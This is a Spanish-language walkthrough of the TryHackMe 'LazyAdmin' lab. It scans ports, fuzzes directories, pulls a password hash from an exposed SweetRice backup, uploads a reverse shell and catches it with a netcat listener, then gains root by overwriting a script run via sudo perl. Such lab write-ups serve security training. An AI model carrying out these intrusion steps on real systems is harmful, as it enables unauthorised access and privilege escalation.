> For the complete documentation index, see [llms.txt](https://enciall.gitbook.io/enciall/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://enciall.gitbook.io/enciall/ctf/try-hack-me/lazyadmin.md).

# LazyAdmin

| Campo                 | Detalle                              |
| --------------------- | ------------------------------------ |
| Nombre de la máquina: | LazyAdmin                            |
| Dificultad:           | Facil                                |
| Plataforma:           | <https://tryhackme.com/>             |
| Creador:              | <https://tryhackme.com/p/MrSeth6797> |

Iniciamos con un escaneo rápido para identificar los puertos abiertos:

```
nmap -p- --open -sS -sC -sV --min-rate 5000 -n -Pn $IP
```

<figure><img src="/files/3LYrJS7qTuYsVcelGz1x" alt=""><figcaption></figcaption></figure>

* **Puerto 22 (SSH):** Servicio SSH corriendo OpenSSH 7.2p2, versión algo antigua con historial de vulnerabilidades. Podría ser útil en la etapa de post-explotación si se consiguen credenciales.
* **Puerto 80 (HTTP):** Sitio web sirviendo la **página por defecto de Apache en Ubuntu.**

Vamos a la página web objetivo:

<figure><img src="/files/uKRcumb13Ym6GXFMWzgM" alt=""><figcaption></figcaption></figure>

Como no se muestra mucha información en el sitio principal, realizamos fuzzing para descubrir directorios ocultos. Usamos **ffuf** con una lista común de SecLists:

```
ffuf -u http://10.10.241.135/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200
```

> &#x20;Asegúrate de tener **SecLists** instalado en tu sistema antes de ejecutar el comando. Puedes instalarlo con:

```
sudo apt install seclists
```

vemos esto:

<figure><img src="/files/hgcrMHSq4QiOEFdOztka" alt=""><figcaption></figcaption></figure>

vemos un directorio oculto llamado **content** vamos a el y vemos esto:

<figure><img src="/files/F5ABsoputTED5G1D5wEY" alt=""><figcaption></figcaption></figure>

vemos que funciona con SweetRice y tiene vulnerabilidades buscamos en exploitdb y encontramos esto:

{% embed url="<https://www.exploit-db.com/exploits/40718>" %}

vemos una ruta:

```txt
/content/inc/mysql_backup
```

si vamos a la ruta vemos un archivo y si leemos su contenido vemos un usuario y un hash&#x20;

<figure><img src="/files/vi3HPIshr813ePh1MKCn" alt=""><figcaption></figcaption></figure>

si vamos a <https://crackstation.net/> y ponemos el hash nos da la contraseña del usuario

haciendo fuzzing en content encontre el directorio /content/as que es un login

<figure><img src="/files/IbeTRk1I7UXB5WeiPYwQ" alt=""><figcaption></figcaption></figure>

si ponemos las credenciales que tenemos vemos que podemos entrar y es un panel de control:

<figure><img src="/files/5dVwKjcq7EG4yxO7qqVX" alt=""><figcaption></figcaption></figure>

explorando vemos que podemos subir un archivo en media center asi que probamos a subir un web-shell con la pagina <https://www.revshells.com/>&#x20;

<figure><img src="/files/jcExYV7oMv0UMFhAwvh7" alt=""><figcaption></figcaption></figure>

subimos la shell en el panel

<figure><img src="/files/SypvmucY8wtVkCp2IfBW" alt=""><figcaption></figcaption></figure>

una vez subida vamos de nuevo ala terminal y ponemos&#x20;

```
sudo nc -lvnp 445
```

<div align="center"><figure><img src="/files/LssuBpqcBkrLT6p40Xb9" alt=""><figcaption></figcaption></figure></div>

una vez le damos click en el archivo se quedara cargando y tendremos en nuestra terminal acceso al servidor

en el sistema tenemos la primera flag en

```
/home/itguy
```

<figure><img src="/files/cifaKm5ZjtDdEaAlIBk1" alt=""><figcaption></figcaption></figure>

despues hacemos un sudo -l para ver los permisos que tiene el usuario para poder elevar privilegios

<figure><img src="/files/oaKME90zTQdo9QCzqWEe" alt=""><figcaption></figcaption></figure>

vemos que tenemos permisos para ejecutar perl  y un archivo llamado backup.pl con permisos de root sin contraseña si vemos el contenido de backup.pl vemos que es un archivo que ejecuta una tarea&#x20;

<figure><img src="/files/vEeLAwK5Ig7EM4wrSOIR" alt=""><figcaption></figcaption></figure>

y si cambios el comando por este otro elevamos privilegios

para elevar privilegios tenemos que poner lo siguiente:

```
echo "/bin/bash" > /etc/copy.sh
```

y&#x20;

```
sudo /usr/bin/perl /home/itguy/backup.pl
```

una vez ejecutado seremos root

<figure><img src="/files/3n6yj5uVzzFcB4vHzcZx" alt=""><figcaption></figcaption></figure>

el flag de root esta en:

```
/root
```
